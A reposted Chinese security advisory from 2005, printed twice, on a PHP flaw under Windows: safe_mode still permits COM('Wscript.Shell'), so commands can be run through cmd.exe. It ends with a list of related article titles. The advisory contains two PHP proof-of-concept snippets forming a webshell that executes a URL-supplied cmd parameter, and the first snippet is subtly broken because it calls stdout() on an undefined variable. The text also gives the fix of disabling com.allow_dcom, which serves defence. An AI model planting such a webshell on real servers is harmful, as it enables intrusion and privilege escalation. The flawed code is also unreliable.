PHP COM组件调用绕过安全模式执行任意文件漏洞
来源:互联网 发布:mac mysql安装教程 编辑:程序博客网 时间:2024/06/06 17:04
创建时间:2005-03-22
文章属性:原创
文章提交:kevin1986 (kevin7c2_at_yahoo.com.cn)
发现日期:2005-02-10
受影响的系统:
Windows 下支持COM()函数的PHP版本
发现人:
Saiy/我非我 From http://www.wrsky.com & kEvin1986
Saiy:dawangs_at_etang.com
kEvin1986:Garnett1986_at_hotmail.com
我非我:wofeiwo_at_bugkidz.org
我非我:
描述:
Windows平台下的PHP脚本平台存在一个安全漏洞,使得PHP设置即使在安全模式下(safe_mode),仍旧允许攻击者使用COM()函数来创建系统组件来执行任意命令.
漏洞出现的原因是由于在安全模式下的PHP平台虽然system();pathru()函数被禁止,但是com.allow_dcom的设置依旧是为true.以至于攻击者可以使用COM()函数创建系统组件对象来运行系统命令.如果是默认的Apache设置或者Web服务器以Loacalsystem权限或Administrators权限运行,攻击者可以使用这个漏洞来提升权限.
测试程序:
-----------------------------------------------------------------
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
/*需要Windows Script Host 5.6支持*/
<?php
$phpwsh=new COM("Wscript.Shell") or die("Create Wscript.Shell Failed!");
$phpexec=$phpwsh->exec("cmd.exe /c $cmd");
$execoutput=$wshexec->stdout();
$result=$execoutput->readall();
echo $result;
?>
/*Windows Script Host 5.6以下版本支持*/
<?php
$phpwsh=new COM("Wscript.Shell") or die("Create Wscript.Shell Failed!");
$phpwsh->run("cmd.exe /c $cmd > c://inetpub//wwwroot//result.txt");
?>
将以上代码保存成*.php文件之后可以在浏览器中执行
http://www.target.com/simple.php?cmd=[Command]
---------------------------------------------------------------
补丁:
目前PHP官方未回复发现者的信件且未发布任何相关补丁.
建议:
在设置安全模式之后,将 com.allow_dcom=true 设置为 com.allow_dcom=false即可.
感谢:
www.4ngel.net安全小组的积极测试.
文章属性:原创
文章提交:kevin1986 (kevin7c2_at_yahoo.com.cn)
发现日期:2005-02-10
受影响的系统:
Windows 下支持COM()函数的PHP版本
发现人:
Saiy/我非我 From http://www.wrsky.com & kEvin1986
Saiy:dawangs_at_etang.com
kEvin1986:Garnett1986_at_hotmail.com
我非我:wofeiwo_at_bugkidz.org
我非我:
描述:
Windows平台下的PHP脚本平台存在一个安全漏洞,使得PHP设置即使在安全模式下(safe_mode),仍旧允许攻击者使用COM()函数来创建系统组件来执行任意命令.
漏洞出现的原因是由于在安全模式下的PHP平台虽然system();pathru()函数被禁止,但是com.allow_dcom的设置依旧是为true.以至于攻击者可以使用COM()函数创建系统组件对象来运行系统命令.如果是默认的Apache设置或者Web服务器以Loacalsystem权限或Administrators权限运行,攻击者可以使用这个漏洞来提升权限.
测试程序:
-----------------------------------------------------------------
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
/*需要Windows Script Host 5.6支持*/
<?php
$phpwsh=new COM("Wscript.Shell") or die("Create Wscript.Shell Failed!");
$phpexec=$phpwsh->exec("cmd.exe /c $cmd");
$execoutput=$wshexec->stdout();
$result=$execoutput->readall();
echo $result;
?>
/*Windows Script Host 5.6以下版本支持*/
<?php
$phpwsh=new COM("Wscript.Shell") or die("Create Wscript.Shell Failed!");
$phpwsh->run("cmd.exe /c $cmd > c://inetpub//wwwroot//result.txt");
?>
将以上代码保存成*.php文件之后可以在浏览器中执行
http://www.target.com/simple.php?cmd=[Command]
---------------------------------------------------------------
补丁:
目前PHP官方未回复发现者的信件且未发布任何相关补丁.
建议:
在设置安全模式之后,将 com.allow_dcom=true 设置为 com.allow_dcom=false即可.
感谢:
www.4ngel.net安全小组的积极测试.
- PHP COM组件调用绕过安全模式执行任意文件漏洞
- PHP任意文件上传漏洞
- php cgi远程任意代码执行漏洞
- FCKeditor connector.php任意文件上传漏洞
- PHP windows 调用com组件
- 任意代码执行漏洞
- JavaWeb安全模式绕过
- Nginx %00空字节执行任意代码(php)漏洞
- WEB安全系列之如何挖掘任意文件读取漏洞
- 【php】php通过COM类调用组件
- 文件包含漏洞(绕过姿势)
- launchAnyWhere: Activity组件权限绕过漏洞解析
- launchAnyWhere: Activity组件权限绕过漏洞解析
- 任意文件包含漏洞
- FreeBSD sendfile(2)函数只写文件权限绕过安全限制漏洞
- PHP远程任意文件读取及目录遍历漏洞
- Fckeditor <=2.4.2 For php 任意上传文件漏洞
- Fckeditor <=2.4.2 For php 任意上传文件漏洞
- emacs 配置文件
- 熊猫烧香病毒vbs版本 仅供研究
- Windows 2003 安全设置之PHP篇
- LINK : fatal error LNK1104: cannot open file "Debug/工程.exe"(小的常识)
- vbs病毒代码
- PHP COM组件调用绕过安全模式执行任意文件漏洞
- disable_functions关闭的函数
- Ubuntu 8.10发布进入倒计时阶段
- windows2003目录权限设置(iis+php+mysql)
- 强烈推荐:240多个jQuery插件
- VC与VSS重新建立关联
- 一个完整的C++工时类
- Delphi中for、while 使用注意事项
- 10月6号-对象容器Set